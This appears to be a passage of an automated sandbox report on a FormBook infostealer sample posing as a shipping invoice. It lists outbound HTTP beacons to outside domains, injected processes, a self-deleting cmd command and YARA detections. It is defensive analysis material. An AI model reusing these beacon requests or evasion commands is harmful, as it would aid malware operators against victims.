Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /mqgf/ was not found on this server.</p></body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49771 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:09:05.652915001 CET | kBytes transferred: 1415 | Direction: OUT | Data:
GET /mqgf/?1bz=KR2H7bR68gwXZ0UwRZoWOm+3/bRM+9g3CvwIMuaCj43AHNBZDZgp33E9vheCRffBPsp5&v2Jx9=0pY0Q8thwtJli0y0 HTTP/1.1
Host: www.gettingthehelloutofca.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:09:05.767719984 CET | kBytes transferred: 1415 | Direction: IN | Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 26 Nov 2020 14:09:05 GMT
Content-Type: text/html
Content-Length: 275
ETag: "5fb7c734-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49772 | Destination IP: 165.227.229.15 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Nov 26, 2020 15:09:11.027050972 CET | kBytes transferred: 1417 | Direction: OUT | Data:
GET /mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a HTTP/1.1
Host: www.caelaabadie.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Nov 26, 2020 15:09:13.298913956 CET | kBytes transferred: 1417 | Direction: IN | Data:
HTTP/1.1 301 Moved Permanently
Date: Thu, 26 Nov 2020 14:09:11 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://caelaabadie.com/mqgf/?v2Jx9=0pY0Q8thwtJli0y0&1bz=r6ma+nh27c9Sl8Bs3eAjHKVnQZRxhfFeaDOjGF4iprZzpmOBYsqZcbWmCWTHzEvxY19a
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8


Code Manipulations

Statistics

Behavior


                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Start time:15:07:08
                                                                                                                                  Start date:26/11/2020
                                                                                                                                  Path:C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:'C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe'
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:438107 bytes
                                                                                                                                  MD5 hash:579BA39B6A146080EF6481591440E445
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

General

Start time: 15:07:09
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe Prehnite,Lychnises
Imagebase: 0xd30000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:07:16
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 15:07:30
Start date: 26/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:07:44
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\netsh.exe
Imagebase: 0x9f0000
File size: 82944 bytes
MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 15:07:48
Start date: 26/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Windows\SysWOW64\cmd.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:07:49
Start date: 26/11/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
